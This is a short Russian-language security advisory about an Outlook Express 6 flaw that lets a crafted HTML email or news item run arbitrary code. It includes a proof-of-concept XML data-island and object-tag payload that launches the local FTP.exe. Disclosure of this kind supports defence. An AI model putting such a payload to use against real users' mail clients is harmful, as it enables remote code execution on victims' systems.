Уязвимость обнаружена в Microsoft Outlook Express. Удаленный пользователь может послать специально сформированное HTML почтовое сообщение или новость, чтобы выполнить произвольный код на системе пользователя.
Сообщается, что этот недостаток может быть связан с недостатком, первоначально описанным в MS02-015 и затрагивающим Internet Explorer. Однако обнаруженная уязвимость работает со всеми установленными заплатками от MS.
Пример (запускает FTP.exe на системе пользователя при попытке прочитать сообщение в Internet
Zone (не по умолчанию!):
<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile"
classid="clsid:11111111-1111-1111-1111"
codebase="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>
Уязвимость обнаружена в Microsoft Outlook Express 6.
